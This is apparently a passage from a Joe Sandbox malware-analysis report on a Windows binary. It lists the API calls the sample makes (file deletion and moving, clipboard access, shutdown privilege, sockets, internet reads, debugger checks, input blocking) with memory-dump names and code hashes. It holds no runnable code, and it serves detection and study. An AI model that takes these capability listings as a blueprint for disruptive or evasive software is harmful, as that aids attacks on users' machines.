                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                              • Opcode ID: 91c4360bf98e359adc2cc9252ed6a79e92615714c08d83f061f9c443eadfcf39
                                                                                                                                                                                                                                                                              • Instruction ID: c15e981f6e5bb90d86032029f009128b395176d5c5d3f096c6178640a32da5d7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c4360bf98e359adc2cc9252ed6a79e92615714c08d83f061f9c443eadfcf39
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67027F71604204AFCB25CF28C895E2ABBE5EF49354F18C49DF849CB2A2DB35EC42CB51
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075D9CD
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0075DA88
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075DA9B
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DAB8
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DAE2
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0075DAC7,?,?), ref: 0075DB5D
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0075DAFE
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DB0F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                              • Opcode ID: 39240e7cfcbebd4f830745093ffb4a13d1b8450971ffebb5eacd0fd46fc1fbb8
                                                                                                                                                                                                                                                                              • Instruction ID: 2b294505829bf6b206bc8e5cc9de45cc0a9be42ed1d531f0f679569465ba6002
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39240e7cfcbebd4f830745093ffb4a13d1b8450971ffebb5eacd0fd46fc1fbb8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F614D3180510DAECF25EBA0C9569FDB7B6AF14301F2080A9E90277195DB796F0DCB55
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                              • Opcode ID: 93bea273878df8e10d9cb073b05a07b14b9f563425c8c2e2206a61246a173f87
                                                                                                                                                                                                                                                                              • Instruction ID: b4dcd621a50570653c80cecb544bb3c849529817dd9dac0b6ba17427d2f9fe21
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93bea273878df8e10d9cb073b05a07b14b9f563425c8c2e2206a61246a173f87
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94418031604616AFD720DF15E488F157BE5FF44358F24C4ADE81A8B6A2CB39ED42CB94
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075205A
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00752087
                                                                                                                                                                                                                                                                                • Part of subcall function 00752010: GetLastError.KERNEL32 ref: 00752097
                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0075F249
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                              • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,?), ref: 006F233E
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 006F2421
                                                                                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 006F2434
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Color$Proc
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 929743424-3772712737
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00751916
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00751922
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00751931
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00751938
                                                                                                                                                                                                                                                                                • Part of subcall function 00751900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075194E
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00751C81), ref: 007520FB
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00752107
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0075210E
                                                                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00752127
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00751C81), ref: 0075213B
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00752142
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0076A5BD
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0076A6D0
                                                                                                                                                                                                                                                                                • Part of subcall function 007642B9: GetInputState.USER32 ref: 00764310
                                                                                                                                                                                                                                                                                • Part of subcall function 007642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007643AB
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0076A5ED
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0076A6BA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00773AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00773AD7
                                                                                                                                                                                                                                                                                • Part of subcall function 00773AAB: _wcslen.LIBCMT ref: 00773AF8
                                                                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007722BA
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 007722E1
                                                                                                                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00772338
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00772343
                                                                                                                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00772372
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0076D8CE
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0076D92F
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 0076D943
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 234945975-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,007346AC), ref: 0075E482
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0075E491
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075E4A2
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075E4AE
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                              • String ID: %.3d$X64
                                                                                                                                                                                                                                                                              • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00722A8A
                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00722A94
                                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00722AA1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                              • Opcode ID: f5d4a5d19570f4cdf86afdafa922ffc7008a7ed70751bd2c2b19cae3ad5c42c7
                                                                                                                                                                                                                                                                              • Instruction ID: 0211927bd5fcb86b65b22463f3fe8c819b8400e81661255976da4c3380f8fe3c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d4a5d19570f4cdf86afdafa922ffc7008a7ed70751bd2c2b19cae3ad5c42c7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831D77494122CABCB21DF68D9887DCBBB4BF18310F5081DAE80CA6291E7749FC58F45
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0071014B: __CxxThrowException@8.LIBVCRUNTIME ref: 007109D8
                                                                                                                                                                                                                                                                                • Part of subcall function 0071014B: __CxxThrowException@8.LIBVCRUNTIME ref: 007109F5
                                                                                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075205A
                                                                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00752087
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00752097
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 577356006-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3e4a98f475476baa0f7c3871c5311e33e1babf4591a3912d66630723884353a7
                                                                                                                                                                                                                                                                              • Instruction ID: b6391b4ba97262ef37706e587027cd888d52c94909ef90970e1ab0e0dc2eeb29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e4a98f475476baa0f7c3871c5311e33e1babf4591a3912d66630723884353a7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3411B2B2400304FFD728AF54DC86DABB7B8FB05711B20841EE44657291EBB8BC86CB64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715079
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715080
                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00715092
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                              • Opcode ID: af1c342bd6754f28d62e881359fbe016081dbdafa0b0e0b99b4f9b7cf168f639
                                                                                                                                                                                                                                                                              • Instruction ID: a0de5718a3dac8344b9b482c275682d95fb1c5dadf7ac1cab4b3721fadd1795a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af1c342bd6754f28d62e881359fbe016081dbdafa0b0e0b99b4f9b7cf168f639
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39E0BF31440548EFCF256FA4DD0DE983B69EF55345F118014F845965A1DB3DDD81CBC4
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0074E664
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                                                                                              • String ID: X64
                                                                                                                                                                                                                                                                              • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                              • Opcode ID: cc6ccbf4cba99eee729d8b1498fec1e8f0f8a625a6b4234e78b7ccff50bd73b6
                                                                                                                                                                                                                                                                              • Instruction ID: 0df93b05bbd4a6a9c1bde3206872bb144443b16055a57a6b2ced931cb62b8e66
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc6ccbf4cba99eee729d8b1498fec1e8f0f8a625a6b4234e78b7ccff50bd73b6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD0C9B480511DEACB90CB90EC88DD973BCBB04304F104A51F106A2040D73895488B24
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764229
                                                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764239
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                              • Opcode ID: 243d29988c02cc47adb1da852e5f1b475a311b676f928f4cbcba812a4a2a69d1
                                                                                                                                                                                                                                                                              • Instruction ID: db6beba3330973ab6508777fe5d3ab33daf8202aa1b64eafd45f32c8ad5c7e31
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 243d29988c02cc47adb1da852e5f1b475a311b676f928f4cbcba812a4a2a69d1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0E5716402286AE72016A5EC4DFEB376EFFC5761F100175F505D21C5D9749D00C7B0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 0076F51A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
